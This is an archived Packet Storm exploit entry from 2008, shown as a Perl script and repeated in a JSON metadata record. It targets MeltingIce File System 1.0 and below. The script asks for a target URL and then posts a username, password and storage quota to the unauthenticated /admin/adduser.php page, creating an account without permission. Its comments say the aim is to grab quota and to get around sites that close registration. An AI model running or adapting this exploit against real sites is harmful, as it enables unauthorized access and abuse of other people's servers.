ID PACKETSTORM:66501 Type packetstorm Reporter t0pp8uzz Modified 2008-05-19T00:00:00
Description
`#!/usr/bin/perl
use strict;
use LWP::UserAgent;
# NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed!
# NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registration.
# Script Download: http://downloads.sourceforge.net/meltingicefs
print "[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\n";
print "[*] ---Discovered && Coded By: t0pP8uZz / Discovered On: 17 MAY 2008--- [*]\n";
print "[*] --- MeltingIce is a file hosting script, this exploit will add --- [*]\n";
print "[*] --- a user via the admin panel, and give it a specified quota. --- [*]\n";
print "[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\n";
print "\nEnter URL(http://site.com/): ";
chomp(my $url=<STDIN>);
print "\nUsername(create's your username): ";
chomp(my $usr=<STDIN>);
print "\nPassword(create's your password): ";
chomp(my $pwd=<STDIN>);
print "\nEnter Quota(quota(mb) of space you want, ie:9999): ";
chomp(my $qta=<STDIN>);
my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" );
my $ob = $ua->post($url."/admin/adduser.php", { "newusername" => $usr, "newpassword" => $pwd, "newquota" => $qta } );
#is_success was acting strangely, so i had to do without.
print "Completed! Try logging in ".$url."\n";
exit;
`
{"id": "PACKETSTORM:66501", "type": "packetstorm", "bulletinFamily": "exploit", "title": "meltingice-user.txt", "description": "", "published": "2008-05-19T00:00:00", "modified": "2008-05-19T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/66501/meltingice-user.txt.html", "reporter": "t0pp8uzz", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:27:32", "viewCount": 1, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:27:32", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:27:32", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/66501/meltingice-user.txt", "sourceData": "`#!/usr/bin/perl \n \nuse strict; \nuse LWP::UserAgent; \n \n# NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! \n# NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registration. \n# Script Download: http://downloads.sourceforge.net/meltingicefs \n \nprint \"[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\\n\"; \nprint \"[*] ---Discovered && Coded By: t0pP8uZz / Discovered On: 17 MAY 2008--- [*]\\n\"; \nprint \"[*] --- MeltingIce is a file hosting script, this exploit will add --- [*]\\n\"; \nprint \"[*] --- a user via the admin panel, and give it a specified quota. --- [*]\\n\"; \nprint \"[*] --- [ MeltingIce File System <= 1.0 Remote Arbitrary Add-User ] --- [*]\\n\"; \n \nprint \"\\nEnter URL(http://site.com/): \"; \nchomp(my $url=<STDIN>); \n \nprint \"\\nUsername(create's your username): \"; \nchomp(my $usr=<STDIN>); \n \nprint \"\\nPassword(create's your password): \"; \nchomp(my $pwd=<STDIN>); \n \nprint \"\\nEnter Quota(quota(mb) of space you want, ie:9999): \"; \nchomp(my $qta=<STDIN>); \n \nmy $ua = LWP::UserAgent->new( agent => \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\" ); \nmy $ob = $ua->post($url.\"/admin/adduser.php\", { \"newusername\" => $usr, \"newpassword\" => $pwd, \"newquota\" => $qta } ); \n \n#is_success was acting strangely, so i had to do without. \nprint \"Completed! Try logging in \".$url.\"\\n\"; \nexit; \n \n`\n"}